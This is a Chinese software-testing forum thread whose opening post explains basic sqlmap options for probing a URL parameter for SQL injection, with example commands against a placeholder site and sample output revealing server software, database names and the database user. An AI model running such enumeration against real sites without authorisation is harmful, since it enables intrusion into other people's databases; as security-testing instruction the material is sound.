51Testing软件测试论坛

 找回密码
 (注-册)加入51Testing

QQ登录

只需一步,快速开始

微信登录,快人一步

手机号码,快捷登录

查看: 3947|回复: 4
打印 上一主题 下一主题

sqlmap用法

[复制链接]

该用户从未签到

跳转到指定楼层
1#
发表于 2013-11-18 14:03:30 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
sqlmap用法
【-u/--url="url"】 #后面接目标网址,表示测试的目标地址。
【-v/--level=number】 #number=[0-5],表示测试结果的详细程度。数值越大,内容越详细。

sqlmap.py -u “url”  -v 0-5

sqlmap.py --url="url" --level=0-5

通过以上参数,会得到:
1、目标的操作系统信息
2、数据库的类型[MySQL/MSSQL/Access]、版本号
3、Web服务器版本、版本号
4、支持的脚本类型

Example:

sqlmap.py --url="http://www.xxxx.com/index.php?ID=111" --level=1
sqlmap.py -u "http://www.xxxx.com/index.php?ID=111" --v 1

Result:

web server operating system: Linux Red Hat Enterprise 3 (Taroon)
web application technology: PHP 4.3.2, Apache 2.0.46
back-end DBMS: MySQL 4

【--current-db】 #表示获取当前数据库的名称。但实测中对Access的数据库不能获得数据库名称

sqlmay.py --url="url" --current-db

通过以上参数,会得到:
1、当前所用的数据库的名称

Example:

sqlmap.py --url="http://www.xxxx.com/index.php?ID=111" --current-db

Result:
current database:    'greenbergdevDB'

【--dbs】#列举所有的数据库名单。我这里只列出来一个。可能是因为权限的问题。

sqlmap.py --url="url" --dbs

Exampl:

sqlmap.py --url="http://www.xxxx.com/index.php?ID=111" --dbs --level=1

Result:

available databases [1]:
# greenbergdevDB

【--current-user】 #表示获取当前数据库的用户名

sqlmap.py --url="url" --current-user

通过以上参数,会得到:
1、当前数据库的用户名

Example:

sqlmap.py --url="http://www.xxxx.com/index.php?ID=111" --current-user --level

Result:

current user:    '********@localhost'
分享到:  QQ好友和群QQ好友和群 QQ空间QQ空间 腾讯微博腾讯微博 腾讯朋友腾讯朋友
收藏收藏2
回复

使用道具 举报

  • TA的每日心情
    无聊
    半小时前
  • 签到天数: 1051 天

    连续签到: 1 天

    [LV.10]测试总司令

    2#
    发表于 2013-11-19 09:40:40 | 只看该作者
    感谢LZ的分享~
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    4#
    发表于 2016-3-7 14:17:23 | 只看该作者
    [quote][/quote]
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    5#
    发表于 2016-7-11 14:08:13 | 只看该作者
    那个php的网址是怎么得到的,我这边的网址都没有这样的后缀啊,抓包出来的也没有
    回复 支持 反对

    使用道具 举报

    本版积分规则

    关闭

    站长推荐上一条 /1 下一条

    小黑屋|手机版|Archiver|51Testing软件测试网 ( 沪ICP备05003035号 关于我们

    GMT+8, 2024-11-26 09:50 , Processed in 0.065337 second(s), 26 queries .

    Powered by Discuz! X3.2

    © 2001-2024 Comsenz Inc.

    快速回复 返回顶部 返回列表